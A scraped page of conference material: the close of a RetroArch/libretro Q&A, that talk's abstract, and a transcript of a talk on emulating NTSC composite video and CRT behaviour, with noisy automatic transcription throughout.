Speaking of these kind of projects, have you seen that there's a new Atari VCS console coming out? I think they call it the Atari Box or the Atari VCS. Atari VCS. Oh yeah. So this is a question of self interest too, because I've got that thing pre-ordered for the last two years. Is there any plans to run retro art on it? Or do you think would there be a lot of changes necessary? That's a really good question and I'm very interested in this as well. I'm not sure if they've opened up what's running on the hardware and if you can install your own. It's not fully open, but a lot of it should be open. There would be a way to get your own software running on it. And the SNES Mini was another one that came out not too long ago. That runs retro art as well? I'm not sure if you can install retro art on that. Or the SNES Classic? I thought I had a box of that over here, but I couldn't find it. When did you order the Atari one? Like at launch, so that's probably to you. I went on the Indiegogo thing and I stupidly thought it might still be coming, but for a while there was a question if they were ever going to release it. I'm getting a comment here, maybe you see the Atari VCS is just a Linux box, so porting it should be easy. Oh, that's really cool. I've got a funny question for Mammoth here. I can also ask this. I checked out your GitHub and I couldn't help but notice that you've got like 732 repositories there. 
Where do you find the time to work on all these GitHub repos? The majority of those are probably forks for pull requests that I was pushing up. Oh, I just filtered only the source repositories. There's only 188, so not that many. Yeah, I just love open source. I love experimenting with new technologies and making new features for open source projects. A lot of these are just experimenting. Most of them aren't actually full on projects. So while you might think it's a big number, it's really, it's all an illusion. But what do you think? What is it that most of your time goes towards in this project in RetroArch? I really, the thing that I'm really excited about RetroArch is the Libretro API and experimenting on getting, like easing the, how hard it is to get interesting projects going on. And then getting the interesting devices like this, like the RetroPie, putting together the little tick 80 Libretro core and then getting that on here. That was great fun. So for that, I had to make a core. I made the tick 80 database which indexes all of the tick 80 games. I created the thumbnails which will index all the thumbnails for tick 80. So, yeah, I just, I just love experimenting and seeing how far you can take the platform. Do you find yourself still playing a lot of games as well? Oh yeah. Yeah, lately I've been playing a lot of lots of war zone war zone is on my list lately. I've been playing, playing a lot of my own games just to test them. So the Dangerous Dave one that I put together, the Flappy Bird little clone that I made. Yeah. Oh, I have to admit that I actually didn't even know Dangerous Dave, but I see you at a Jarmiro wrote it. Yeah, yeah, it was, it was a, I loved playing it way back in the day. So, thought recreating it would be a fun experiment and I learned a lot about like 2D game development platforming and like entity systems. Pretty cool. Like components entity systems or. We're getting a question by the way from Marcus week, what are your long term goals for improving retro are are you chorus and how do you plan to archive them. Long term goals for retro. Well, a lot of the, a lot of the project right now is really focused on on the hardware, bringing LACA to more systems. So there was the crazy build bots, the new build bot stuff that we've, we've been working on. There's a blog post that just went live last week that outlined a whole bunch of the new build bot, looking to get more cores into there. Yeah, you mentioned you want to work on the build box. Like, what exactly, because it sounds like are you doing a lot of what's what's the short term stuff you're doing for the build. So the build bot, it will compile all of the different versions of retro that are out there, along with all the cores. So getting more, more platforms represented there is is a big thing. So, right now I don't think it compiles. So I'm working with the architectures for Mac. So making sure that it can get the 64 binaries in there. Making sure that it's, it's compiling across all of the different versions of windows as well. The, the arm Linux cores aren't aren't in there yet. So that's, that's another thing. There's going to be more down the pipeline. A lot of it is is, I've seen a whole bunch of changes go up for get lab, the get high as well. So making sure that all cores have the get lab actions represented is another thing. There's a whole bunch of bunch of work that we have a lot of work to do. So, see we have five minutes left actually. So speaking of a whole lot of work to do as a beginner. 
Is there anything or any advice you would give to a beginner how would they get started in in this. How could they contribute to retro rush or libretto. Yeah, that's a really good question. Getting involved is is is a really important libretto is all open source the whole, all the code that you can see is is available for for everything. So visit get hub.com slash libretto. And all of the repositories. If you're interested in having your own, your own games listed when you scan content that's the part of the database system so check out the database repository. There's, there's art as well that people need to have so if you're interested in making themes you can check out the assets. If you're interested in like debugging and testing out new versions you can also download the latest retro from the master like the live master and test out the version that's upcoming to close that issues and make sure that things are running so there's a whole bunch of things that people that we all rely on. So your involvement is definitely definitely needed. There's also the forums. Libretto has a discord as well so that you can chat with people directly. I really like using the discord for for net play so that you can have voice chats with people when you're playing with them online. So hopefully join the discord and we can start up some conversations and get some of my favorite features actually the net play. I like Tetris attack on the SNES. Oh Tetris attack. Yeah, that's amazing. Little like arcade games that I love playing that play with. I see some people typing in the first time systems going to cut us off in a couple minutes as well. It will automatically creates like a backup channel. But otherwise, is there anything that you would like to add that maybe you didn't say your presentation or some advice you would like to give people or just anything. I want to thank you all for for coming. It's been, it's been so amazing to see all of the momentum that Libretro and the community has brought over the past few years. Yeah, so keep up, keep it up, keep up, keep up those actions that you're been going on. It's pretty amazing. And thank you all for coming. Really appreciate it. Great. And thank you for also showing up just in time. Yeah, I was going to get my video wasn't working for some reason so I'm glad that it all got resolved. Great. Thanks for the talk. If people want to find you, I guess they can either message you on discord and I think article is that how you pronounce it is also available maybe on matrix. Yeah, thanks a lot and keep doing what you're doing. Yeah, thank you. Thanks for hosting. It's my great pleasure. Alright guys, see you next time.
|
RetroArch is a free, open-source and cross-platform frontend for emulators, game engines, video games, media players and other applications. The libretro API is designed to be fast, lightweight, portable, and without dependencies. Due to the number of systems and games it can play under a single user interface, RetroArch has grown immensely over the years, and has been well adopted by the emulation scene. Since its inception as SSNES and libsnes, libretro has grown much beyond its humble upbringings. libretro and RetroArch provide a way to connect different applications, emulators and game engines together in a single application. libretro has a unique mission design in turning the way applications are built on its head, by enabling the modularization of software. Instead of merely thinking in terms of a standalone application, software is redesigned and re-engineered to become a pluggable module that interfaces through a common API. Standalone applications implement this API to gain access to this module. Our belief is that by following this model, applications can be more easily updated and extended, since there is a clear separation between application and core domain. In this session, we will cover: What libretro is all about and its software model Interesting frontends and hardware you can use libretro cores and how to implement your own The ecosystem surrounding RetroArch What's next for the project Join Rob Loach, libretro maintainer, as he discusses how you can fully leverage the libretro API to bring modularized applications and systems together.
|
10.5446/53647 (DOI)
|
Hello and welcome to Emulating the Full NTSC Stack, or Creating Objective Video Artifacts. My name is Thomas Harte. So, starting from the basics. A classic video display device (for the purposes of this talk I'm going to treat cathode ray tubes as the exemplar) outputs content by scanning from top left to bottom right. To achieve this, it maintains two current deflection positions, one horizontal, one vertical, each of which proceeds as an approximate sawtooth. They're completely independent of one another, so the flying spot is always moving horizontally and it is always moving vertically. Therefore, the output is a series of shallow diagonal scans; there's no such thing as a truly horizontal scan in traditional analog video output. That's the output, so what's the input? For the purposes of this presentation, the input is just the stream of intensities to paint, separated by sync pulses. Approximately speaking, sync pulses are either long or short, indicating either a vertical or a horizontal retrace, so you're going to need to measure the length of syncs and classify them one way or the other. In real life, there are also things called the front and back porch, which help to ensure that no content is painted during retrace and establish the amplitude range of what follows, and the sync pulses should carry things called equalization pulses, but I'm going to ignore all of that for the purposes of today. Since the CRT's output spot is always moving, the sync inputs are advisory only. A CRT will try to pull its deflection generator into phase with them via a couple of phase-locked loops, but that's best effort only. To put it another way, a CRT is not going to pause and wait for a sync input; it's just going to keep on moving. A common kind of phase-locked loop deployed in classic analog electronics is a simple flywheel sync. Each time the CRT discerns, say, a horizontal sync, it will measure how much error there is between the timing of its internal generator and the timing of the input. If its generator would have fired a little too early, then it slows it down a little; if it would have fired a little too late, it speeds it up. So let's look at what all that implies for potential implementations up front. We're going to have a bunch of pixels coming in which need to end up on the screen, so there's going to be some streaming to the GPU there. Output is going to be a series of one-dimensional scans, but since the scans actually have heights, we're going to generate them as quads, and those also are going to need to be streamed to the GPU. That suggests, in general, a pipeline where we're dividing data and generating scans on the CPU and posting them off to the GPU, which means we're ideally going to need some sort of shared memory space for passing them off; and if your graphics API allows it, seriously consider whether you want to disable texture swizzling. Normally, without getting too far into it, a GPU tries to ensure good cache locality for pixels that are nearby in 2D terms, but in this case you're always going to be referencing content from left to right, top to bottom, so ideally you would keep a classic raster structure for caching purposes. So supposing you've implemented all of that, let's see where we are. Monochrome video works! We're also accurately modelling the effect of sync errors. I'm cheating a little here by showing you a British computer with 50Hz power-style timings, but the point carries across; a toy sketch of the flywheel idea follows below, before the demo. 
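This is hypothetical toy code rather than anything from the talk: classify each sync pulse by how long it lasted, and nudge a free-running horizontal generator towards incoming horizontal syncs rather than resetting it.

```c
/* Sync pulses are told apart purely by duration: short ones (about 4.7 us in
   real NTSC) mean horizontal retrace, long ones vertical.  The 16 us
   threshold here is illustrative, not taken from any standard. */
enum sync_kind { SYNC_HORIZONTAL, SYNC_VERTICAL };

static enum sync_kind classify_sync(double duration_us)
{
   return (duration_us > 16.0) ? SYNC_VERTICAL : SYNC_HORIZONTAL;
}

/* The horizontal flywheel: phase runs from 0 to 1 along the line and simply
   wraps; syncs never reset it, they only adjust its speed a little. */
typedef struct {
   double phase;          /* current position along the line, 0..1 */
   double step;           /* phase advanced per input sample */
   double nominal_step;   /* step implied by the nominal line rate */
} flywheel;

static void flywheel_advance(flywheel *fw)
{
   fw->phase += fw->step;
   if (fw->phase >= 1.0)
      fw->phase -= 1.0;   /* flyback to the left edge */
}

static void flywheel_horizontal_sync(flywheel *fw)
{
   /* Error between where the generator is and where the sync says it should
      be (phase 0).  Phase just past zero means we fired a little too early,
      so slow down; phase short of 1.0 means too late, so speed up. */
   double error = (fw->phase < 0.5) ? -fw->phase : (1.0 - fw->phase);
   fw->step = fw->nominal_step * (1.0 + 0.05 * error);
}
```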
This computer, the ZX80, is unable to generate video at the same time as it performs processing, and doesn't know what should be in the frame when it resumes video, so typing anything leads to a sync discontinuity. As you can see, our model display is initially out of phase each time I press a button, but it quickly locks back in. As the flywheel sync makes an acceleration decision proportional to position, you end up with damped simple harmonic motion, which is a fancy way of saying that the error bounces like a sine wave as it resolves. And if that mention of mathematics has upset you, you probably want to skip the rest of this presentation. This is going to be a slog, specifically because I want to get into how colour was added to the existing monochrome television broadcasts while maintaining backwards compatibility. The decision was made to divide up the existing luminance signal into a low-frequency part, which would continue to describe luminance, and a high-frequency part for chrominance; in this context, high frequency means around 3.58 MHz, or 227.5 cycles per line. So then the question arises: how can you ensure that chrominance information stays at the high-frequency end of the spectrum? If it were one-dimensional, then prima facie you could just amplitude modulate it, that is, multiply the input level by a carrier wave, here a simple sine wave; but chrominance is actually two-dimensional. So if you're going to follow that line of argument, then you need to find a two-dimensional version of amplitude modulation, and luckily that exists. It's called quadrature amplitude modulation, in which the two incoming chrominance signals, here U and V, are multiplied by two different sine waves which are exactly 90 degrees out of phase, which is called being in quadrature. So then, allowing for luminance, the formula for the instantaneous output of an NTSC signal is as shown on this slide: it is Y for luminance, plus U times sine theta, plus V times cos theta, for chrominance signals U and V. In real life, the U and V signals are scaled down a bit, so they have a lesser total amplitude than the luminance does, but it doesn't make a substantial difference to the mathematics, so I've omitted that constant here. I'm also glossing over a bunch of other smart moves that the designers made with regard to backwards compatibility. Rest assured that if you were to view a colour signal on a purely monochrome set that predated the introduction of the colour standards, then you would get what looked like a slightly noisy picture, but there wouldn't be anything too obviously wrong with it. That's partly because the colour subcarrier is not an integral multiple of the line rate, so the exact noise that it contributes varies from line to line (in this case it's exactly the opposite on one line to the next), and it's also because the total length of a field means that the noise on one specific line will change from field to field, so it's not consistent over time and it is not consistent over space. So once again, let's look at where we are. Here is a screenshot from the Atari 2600 of the video game Pitfall, now with composite colour information added. A few points worth making. The Atari 2600 actually generates off-spec video; specifically, it makes each horizontal line slightly longer than it should be in order to squeeze in 228 colour cycles. As a result, the colour subcarrier here shows as consistent vertical stripes. 
It's actually a fairly common thing for NTSC machines to do. The Apple II does the same thing; the TMS9918 machines and those that descend from it, such as the Master System, do the same thing. The reason is that it simplifies the electronics: you're outputting the same colour burst every single line and all the other timings are exactly in phase, so it just simplifies the electronics. Okay, so we've managed to add colour to the video signal, but how can we extract it again? Well, let's assume that a thing called a low-pass filter exists, which would be smart, because it does. Such a thing is a black box: you feed it an input signal and it gives you an output signal which is the same as the input except that all the high-frequency parts have been taken out. If we had such a thing, then we could get luminance back and leave chrominance alone, and luckily we have many options for implementing such a thing. The most generic one is a finite impulse response filter, which in implementation terms just amounts to a weighted average around an output point. You might have heard of them as processing kernels, especially in the image-processing world, and they're naturally parallel stuff, ideal for GPUs. They're certainly not the only option; especially in a case like this there are some specific possibilities like comb filters and box filters, and I will seek to return to those later. Okay, so you've got your low-pass filter and you've extracted your luminance; of course you can then subtract the luminance from the original signal to give you just the chrominance part, so you're sitting on top of U times sine theta plus V times cos theta. How are you going to get back to U and V? Well, we've multiplied by some things, so maybe we could divide by some things; but you can't really do that here, because both sine and cosine go through zero, so you would produce an asymptotic result. Okay, well, take a leap with me on this one: let's instead multiply. I'm going to focus for a bit on extracting just the U component, and I'm going to assume that theta is known. Of course, once you can extract U you can also extract V, because the two components just sit 90 degrees apart in phase, so let's go with the multiplying. Okay, welcome to the most fun slide of the presentation; we're going to have a lot of fun here, let's go. Here in this box are some product identities. We're going to take these as given; you can look them up if you like, but all you need to know is, and again trust me, it's true: sine theta sine phi equals cos of theta minus phi, minus cos of theta plus phi, all over 2; and cos theta sine phi equals sine of theta plus phi, minus sine of theta minus phi, all over 2. Those are just facts, roll with it. So, starting up here, here's the U times sine theta plus V times cos theta that we started with, and as I told you, we're going to multiply by sine theta and see what happens. Well, that's not hard to write out more neatly: it's U times sine theta sine theta, plus V times cos theta sine theta. Great, where did that get us? It got us to the point where we can use our product identities. So sine theta sine theta: we're going to treat that as sine theta sine phi and therefore substitute in cos of theta minus phi; well, okay, in this case theta equals phi, so that's cos 0; and then subtract from that cos of theta plus phi, and again they're both theta, so that's cos 2 theta; and divide by 2. Then, rolling on to the next side, we've got V times cos theta sine theta, and that's this other one, isn't it? 
Cos theta sine phi is sine of theta plus phi, so for us it's sine 2 theta, minus sine of theta minus phi, which is sine of 0, and divide that by 2. Well, okay, but cos 0 and sine 0 are clearly constants; specifically, cos 0 is 1 and sine 0 is 0, so we can simplify a bit more. It's now U times 1 minus cos 2 theta, over 2, plus V times sine 2 theta over 2, which, if we pull it apart a bit more, is basically U times a half, or U over 2, plus a whole bunch of trigonometric functions of 2 theta. But if you'll recall, on the last slide we assumed that a thing called a low-pass filter exists, so we can just use another one of those: we're going to get rid of everything that hangs around the 2 theta sort of range and just keep the low part, and magically we have extracted U. Wow. Okay, so that was thankfully the peak of the mathematics that I need to discuss today; let's have another look back at the concrete implementation, because this is how I implemented it. On the CPU I am still dividing the input into scans and producing quads and throwing them all off to the GPU and letting it deal with it. On the GPU I have two passes. In pass 1, apply a low-pass filter to separate luminance from chrominance, and at that stage multiply chrominance by a sine and a cosine, so the input is single channel and the output is three channels (in actual fact it's four, for reasons to do with retaining information from the colour burst, but again I'm kind of glossing over that for now). For GPU pass 2, the input is the luminance signal plus the two multiplied chrominance signals, so it's going to low-pass the two chrominance signals in order to get their true values, that is, get rid of the 2 theta part that we just discussed; and I also chucked in an additional high-pass filter on luminance. I could have done more of a windowing filter in pass 1, but then I would have had luminance information leaking into chrominance, so I just decided to do it in two steps; I'm sure that smarter people might do something smarter. At this point it's immediately before output, so this is where I apply gamma correction if relevant. Most computers today have, nominally at least, a gamma of 2.2, which is exactly the same as NTSC, so there's nothing to do there; but PAL has a nominal gamma of 2.8, so if you were processing a PAL signal you'd want to do some further gamma correction. And that's it: success, well done, you've implemented the whole thing. Here's Pitfall in colour, here's Prince of Persia in colour, life is good. A rough CPU-side sketch of those two passes follows below. 
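Here is that sketch: a hypothetical, deliberately naive per-scanline version in plain C rather than the speaker's GPU shaders. The low-pass used is a one-colour-cycle box filter, one of the simple options discussed next; the factor of two undoes the halving that fell out of the product identities, since multiplying the chroma by sin theta gives U/2 minus (U/2)cos 2theta plus (V/2)sin 2theta and the second low-pass removes the 2theta terms. The small encode_sample function is just the Y + U sin theta + V cos theta formula from earlier, included for reference; none of this is the speaker's actual code.

```c
#include <math.h>

#define MAX_SAMPLES 4096   /* arbitrary per-line buffer size for this sketch */

/* The composite formula from earlier: one output sample of Y plus
   quadrature-modulated U and V (amplitude scaling omitted, as in the talk). */
static double encode_sample(double y, double u, double v, double theta)
{
   return y + u * sin(theta) + v * cos(theta);
}

/* Simplest stand-in for "a low-pass filter exists": average over roughly one
   colour cycle.  spc would be 4 if you sample at 4x the colour clock. */
static void lowpass_box(const double *in, double *out, int n, int spc)
{
   for (int i = 0; i < n; i++) {
      double sum = 0.0;
      int count = 0;
      for (int k = 0; k < spc && i + k < n; k++) {
         sum += in[i + k];
         count++;
      }
      out[i] = sum / count;
   }
}

/* Pass 1 and pass 2 from the talk, done per scanline on the CPU.  theta0 is
   the subcarrier phase at the first sample, dtheta the phase step per sample.
   n must not exceed MAX_SAMPLES. */
static void decode_scan(const double *composite, int n, int spc,
                        double theta0, double dtheta,
                        double *y, double *u, double *v)
{
   double mu[MAX_SAMPLES], mv[MAX_SAMPLES];

   /* Pass 1: low-pass for luminance, subtract to isolate chrominance, then
      mix the chrominance down against sin and cos of the carrier phase. */
   lowpass_box(composite, y, n, spc);
   for (int i = 0; i < n; i++) {
      double theta  = theta0 + dtheta * i;
      double chroma = composite[i] - y[i];
      mu[i] = 2.0 * chroma * sin(theta);
      mv[i] = 2.0 * chroma * cos(theta);
   }

   /* Pass 2: low-pass again to drop the 2*theta terms, leaving U and V. */
   lowpass_box(mu, u, n, spc);
   lowpass_box(mv, v, n, spc);
}
```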
So let's return to the topic of low-pass filtering, because I kind of glossed over it a moment ago. As I said, there's a very generic solution, which is called a FIR (finite impulse response) filter, and it ends up being just a weighted average of input samples around a desired output sample. A question you might have in your mind is: what coefficients are you talking about? Personally, I use a Kaiser-Bessel window to generate the coefficients; that's pretty mathematically complicated and I'm not sure I could adequately explain it, but trust me, it exists and it makes sense. You'll also see windowed sinc documented a lot. So if you want, in your code, a generic "I want a low-pass filter with this cutoff frequency", then I would recommend looking into one of those. But there are other options, in both coding terms and in real life. A comb filter eventually became popular for filtering the luminance part out of an NTSC signal; it's a bit more expensive to implement on the analog side, so we're talking later televisions here. Regardless, it makes the observation that if you were to sum Y plus sine theta and Y plus sine of theta plus 180 degrees, you'd just get Y; none of the sine stuff survives, because sine of theta plus 180 degrees equals minus sine theta. So if you took two samples that were 227.5 colour cycles apart, which in conformant NTSC terms is one directly vertically above or below the other, and you averaged them, then supposing they originally had exactly the same luminance and exactly the same chrominance, you would get exactly the correct output luminance. Later TVs actually did more of a three- or four-point averaging, not just across lines but also across fields, and that's commonly referred to as a 3D comb (there are higher dimensionalities too, but "3D comb" will do; it's the marketing term). That's really late-stage television stuff, probably into the late 90s, by which point you've definitely got some digital electronics in there. Another easy solution to implement on a GPU or a CPU, and certainly easy to comprehend, is just a box filter: if you average every sample across one entire cycle of a sine wave, the sine contribution should sum to zero, so you can average across a single wave of the colour subcarrier and hope to extract luminance that way. That's obviously a strictly horizontal operation, and it's another one I use sometimes; it tends to produce a sharper output than a blind finite impulse response filter, at least for the same number of input samples. FIRs are really great, but ideally you would turn the number of input samples up very high, and that gets prohibitive in real-life implementation terms. In any case, the point I'm making here, I guess, is: play around with it. So, a lot of this presentation has been specifically about cathode ray tubes, so let's talk for a moment about some specifics of them, and the question is: what about phosphor decay? It's not really NTSC related, but on a CRT many people perceive that frames blend one into another. That's not really true: when an actual CRT is painting a field, actually only about a fifth to a quarter of the display is lit at any given time, because the phosphors decay really quickly, but psychology plus persistence of vision makes up for the rest. You see a solid image because your brain thinks that's a more likely outcome than what it's actually seeing. So I decided to implement phosphor decay, and this was my first implementation: buffer scans. So the quads I produce, just keep them around for longer, keep them for several frames, 
and every time I need to produce a frame of output I redraw every single one is still buffered with appropriate logarithmic decay or brightness which you know it's it's it's not too dissimilar from how a real display would be perceived other than the you know the fiction of talking about discrete lines and times of in terms of decay but it produces rolling brightness errors similar to those that you might get if you pointed a classic analog camcorder at a classic CRT so it didn't really like that implementation well I mean I liked the implementation I didn't like the result if it's even worth distinguishing those things so instead at the minute I use this kind of hand waving solution I came at it from this angle the objective is that every pixel on the screen should be consistent brightness so I can achieve that must easily by just keeping a persistent frame buffer which is sort of an accumulation buffer but not in the classic GP API sense but it is one accumulating things so go with it and I'm doing standard alpha blending of skins that is to say that new scants will be drawn with a certain opacity whatever let's say it's 0.7 and they will definitely be drawn by doing you know input times 0.7 plus whatever is already there times 0.3 which ends up being an oiler-esque discrete approximation of logarithmic decay for anything that is currently on screen since it will be progressively multiplied by 0.3 and then again by 0.3 so it's 0.3 to the to the number of times it's been overdrawn there's only one big drawback to that implementation and that is that you may not touch every pixel on display every field because during moments of sync error that are going to be parts of display that are not painted at all so to get around that I decided to use a stencil buffer so that means dividing scans into the frames in which they sit which is not something that I was otherwise doing and join each frame using the stencil to mark as painted anywhere that a pixel has been updated and then at the end of the frame of course I can inspect the stencil and apply a simple you know multiplied by 0.3 I'm going to keep sticking to those example constants for any pixel that was not overpainted and that gives you know let's roll with it kind of approximation of quote unquote phosphor decay and again I really want to emphasize this this is this is not a lot of science on this this slide this is a perception thing if you wanted nice solid vibrant colors you would definitely never ever do any blending and indeed ideally you'll do some sort of black frame insertion which is the exact opposite of what I'm doing here but I think that perceptually it's more accurate but I don't know attack me as you will so as a quick bonus let's discuss pal pal is like ntsc version 2 it was designed a few years after ntsc had gone into broadcast and was a response to some of the real life practical problems that ntsc creates specifically if you've ever seen an old-fashioned American television it has a tint control and that is to correct for phase errors which result from the analog electronics involved in the fact that in you know real analog terms things don't charge and discharge instantly and signals don't propagate instantly and the implementation doesn't quite match the mathematics. 
Pal attempts to resolve such phase errors by alternating phase each line indeed that's what the name comes from so on one line you will have phase going positively upwards it will start on the left at for argument's sake well it's just called n and it will end at the right on n plus something but in pal well on the next line the phase will go negatively so it will start at n and end at n minus something that's you might observe that cos of theta is equal to cos of minus theta and sin of theta is equal to minus sin of minus theta and therefore another way to describe the changes made in pal is that it flips the sign of one of the color subcomponent as amplitude modulated per line mathematically I do have these descriptions of the fixed pal makes is correct so because of that change a fully featured pal decoder can do something clever it can and I'm going to hand wave this one also it can kind of average the chromance line after line and thereby eliminate phase errors at the cost of some resolution our chromance resolution only lumens remains high resolution but if you if you don't want to you know implement a delay line another costly electronics it's costly in 1950s terms anyway 1960s then you can just implement a pal s decoder which acts almost exactly like ntsc every line is decoded separately and the colors come out as the colors come out and because of the specific exigencies of my implementation it's not particularly easy to correlate data from one line to the next so I've only implemented pal s also back in the day you might have seen pal s because of a desire to avoid some telefunken patents and you know boo patents so so let's see how my implementation does with pal s here we go so on the left is an undecoded version of the composite signal on the right there it is decoded and in the box out there is a zoom in of a different part of the same software title showing the the artifact that results in this case it's jumping up and down vertically a little that's because the particular computer this signal is a simulation of which is the acorn electron outputs an interlaced signal and in this case by gift capture it's kind of making it jump a bit more than it does when you're actually looking at it with your eyes. Trying to quick corollary of the video stack discussed so far today that your output is no longer frame centric the multipaths stop in my implementation breaks down only as far as individual lines but yours may be entirely continuous and the benefit of that is freedom from a classic emulation loop in which the emulated calculates and posts a frame blocks on bsync then calculates the next etc etc etc and the issue with that loop is that latency gets worse as computers get faster e.g. on a host computer that is infinitely fast calculating the next frame will be instant so with a loop as just discussed i.e. 
you know post and block then your emulator will wake up on vsync calculate a frame instantly push into the pipeline then block for the entirety of the output frame before waking again so you've at least one output frame of latency before any of what you just drew becomes visible and a full two frames of output latency before the final part of what you just drew hits the display so that's a one point five frame average but if you've modeled video output is continuous as per the presentation today then you can capture the current state of the CRT at any point by pull rather than by push assuming you can also observe vsync without blocking on it or make a reasonable projection of when it will occur which is what i do under cute just an average and a couple of standard deviations i probably need to test that more anyway that means the moment the host retrace begins you can quickly capture the current state of the emulated CRT and post that before the host display starts its next frame so the host reaches the bottom of its frame you then update the frame buffer while the raster is retracing the first bit of content that you've just posted will of course appear essentially immediately so latency of zero but the final bit will not appear until the end of the next frame which is therefore one frame but that gives you an average of zero point five frames latency rather than one point five so you've you've cut off two thirds of your average output latency and furthermore those frames that you're posting or the latency rather that i'm measuring that in that zero point five quote unquote frames their host frames not emulated machine frames so if your emulator is running on a machine with a high refresh rate monitor such as 120 hertz 144 hertz etc then that user will see a corresponding decrease in latency they you're actually giving them some value for the specialized equipment that they have invested their money in so they will probably come to your house and give you gifts of course this is quite different from the way things work in a classic pusher frame and weight emulator in which case such an emulator is going to output 60 frames a second end of story and those are going to appear on the 144 hertz monitor however they appear as a bit of an aside this is the other reason that I currently use an accumulation frame buffer above and beyond sort of attempting to appear crts with regards to phosphor decay in persistence it substantially softens the appearance of tearing in cases where the host and the emulated frequencies don't match up that well it's not only true of high frequency rate monitors it's also true of displaying 50 hertz signals at 60 hertz which speaking as a British person who now lives with the modern suite of available computers is a very good thing basically the choice there is between motion aliasing and softness so I picked softness my implementation at least on the Mac seeks further to minimize tearing by adding a phase locked loop to pull the host and the emulated vertical retraces into sync or into phase rather would be a more accurate way of saying that provided that they are sufficiently quote unquote compatible which in practice means that the host display has to be very close to being a divider of the emulated display in that case you shouldn't see any tearing at all provided that the mechanism is working and now something I personally haven't implemented yet but which is obviously another potential big win is full rate full racing of the raster so no on windows you can 
currently know you can directly pull for current raster position and on other platforms you can make a reasonable guess if you've observed that your vertical retrace interrupts soon to be coming in 60 times a second and you know it's been one one twentieth of a second since the last one you can reduce it you're probably about halfway down display although you can actually do any better job of that by making reasonable assumptions about retrace periods and so on regardless the point is you can have a pretty good idea of where the beam is just based on observing suitably high precision clock and using that information on any platform that allows tearing you can of course fully race the raster you can run your emulator completely in lockstep with the actual on the wire video output thereby almost completely eliminating output latency. So a quick grab bag of other items I should mention before concluding this presentation number one the colour burst I've kind of overlooked much mention of that at all so far the colour burst is a signal that occurs shortly before the visible part of the line which demonstrates the current phase and amplitude of the colour subcarrier. If there's no colour burst then a good display should decline to decode colour at all treating the input signal as purely monochrome so it's probably smart to include a pathway for that in any code you're writing in particular some old machines are monochrome such as the ZX80 that we already saw and some such as the Apple II can output a colour burst or no colour burst depending on the graphics mode. Number two PCM sampling rate let's suppose that you want to come up with a PCM sampling of NTSU data either because you're actually sampling an existing signal or because you're emulating it in that case make sure you do so at at least four times the colour clock rate I can't really go thoroughly into the mathematics behind that because I'm not especially qualified but here's a version I hope will persuade you if you had a single amplitude modulated signal then it would have an inherent frequency of whatever the frequency of the amplitude modulation is and therefore per Nyquist you would want to PCM sample that at twice the rate of the subcarrier but in this case we're talking quadrature amplitude modulation so we've kind of got the two amplitude modulated signals 90 degrees out of phase so you know you're kind of need to do like double Nyquist which turns into four times the colour clock I don't know if anybody is rolling their eyes I certainly hope I don't have any real mathematicians in the audience but that's the that's that's the rule of thumb four times the colour clock in my particular implementation I use whatever is the least integer multiple of the input pixel clock there's also at least four times the colour clock often leads to lines that are more like you know 1500 samples long than 1000 samples long but it's it's no big deal I should also say that in my particular implementation there is an additional GPU step additional pass that I kind of didn't mention because it's not relevant to a generic implementation that does input data conversion to raw PCM and clock rate conversion these are both kind of basic pixel manipulation things so they're more GPU stuff the objective there was that these CPU codes should have to do as little as possible to convert between the native pixel format of the machine being emulated and something it can post to the GPU there's still going to be some conversion because I have now nailed myself 
down to a fixed I know six or seven or eight pixel formats that I support but it's hopefully limited in particular I support some direct PCM format there's a couple of straightforward ones there's you know like one bit luminance data there's eight bit luminance data there's one slightly less straightforward one where you supply four luminance samples and the GPU picks whichever of those is appropriate given the current phase it helps with avoiding unrealistic numbers for certain machines it's a pragmatic pick I've got a couple that are luminance plus phase related that's a special case of color encoding that is used on at least a couple of notable machines from early in the home computer market specifically I'm thinking of well the Atari 2600 which isn't a home computer it's a home console and the various Vic machines from Commodore so the Vic 20 and the Commodore 64 they both internally represent color as as a luminance plus a phase offset so they have a single sine wave and they just push it back and forth depending on the selected color so I have a couple of a couple of pixel formats that directly represent that which is actually really neat so my Atari 2600 there is no RGB lookup table anywhere as directly just lumens plus phase which is calculated algorithmically based on the palette index and then the the entity decoding takes over and produces hopefully the correct colors and you saw the screenshots make your own mind up I also have various positions of RGB that was another slightly pragmatic choice there are some machines where RGB is you know two bits per channel for example well the master system is two bits per channel the abstract CPC is actually slightly less than that because it is three potential values per channel and in that case I didn't want to be streaming more data to the GPU than I really needed to so that that is an 8-bit RGB format for that a reasonable number of machines have you know 4096 color palette the Atari ST actually that's that's the ST I'm probably talking about there the Amiga the Apple 2GS so there's a there's a you know two byte format and then there's a full 4 byte for anything else it doesn't fit and also in my emulator it's not just necessarily decoding Palo NTSC sometimes it is encoding it because some machines are natively internally RGB and they just have black box Palo NTSC encoders about which often very little is known so for those I use generic encoders and just hope that the output looks reasonably close I mean it usually does so I don't know I can't claim 100% accuracy on those machines but that's the best information I have notably absent from that list are the Apple 2 and the Apple 2 a programmer actually directly generates the luminance output signal it's a one bit thing and they're directly poking bits high or low go straight onto the wire there is no color encoder the other one is the Oric the Oric is a British home computer and it has a color ROM so it has a off the top of my head I want to say 128 byte ROM probably have to look that up but inputs are phase as a two input actually it's in quadrature so two bits for that plus four bits for the currently selected color and the output is just the correct digital level to put directly on the wire which goes to a basic resistor ladder digital to analog converter so that ROM has been dumped and the emulator can use it directly and then of course there's a lot of the machines I mentioned there are actually luminance plus phase the ones I actually support these are 2600 and a bit 20 and in 
both of those cases you know it's not a generic power NTSC encoder it's a it's a generic luminance plus phase offset encoder but that's still queuing relatively close to the original hardware so that's everything I had to say here are some contact details I look forward to talking to you in a moment. Seems like we're live? Okay. I hope. Okay I'm going to take this last question and start. Okay it seems like we're live so hi Tom thanks for your really interesting talk I watched yesterday actually but I raised a lot of questions for me because that's it's way out of my league but whatever we're here to learn right so thanks again for being here didn't see that many questions yet though they're starting to come in so I'll start with the first one I saw is that is this implementation portable across multiple hardware implementations NTSC is NTSC but to certain computers or comes also weird stuff with a signal that has to be accounted for? So it certainly tries to be portable against all potential video generators and some of the machines I've added to the emulator have been specifically to test that so the emulator is actually like my specific implementation of this is coming on I don't know five years old maybe maybe six I'm not really I should pay more attention to these things but initially it was just the Atari 2600 which does generate video with frequency kind of baked in I'm losing track of my thoughts here. I've added a bunch of machines since but so a recent one actually the Apple 2 I only added a couple of years ago and that's because the Apple 2 the program is responsible for generating a large part of the color signals that was supposed to be the first time but I hadn't written like both sides of the equation in case I had a fundamental misunderstanding and I wasn't revealing it because I wasn't testing it but incredibly that did just work so yeah in principle if you've if you've allowed for 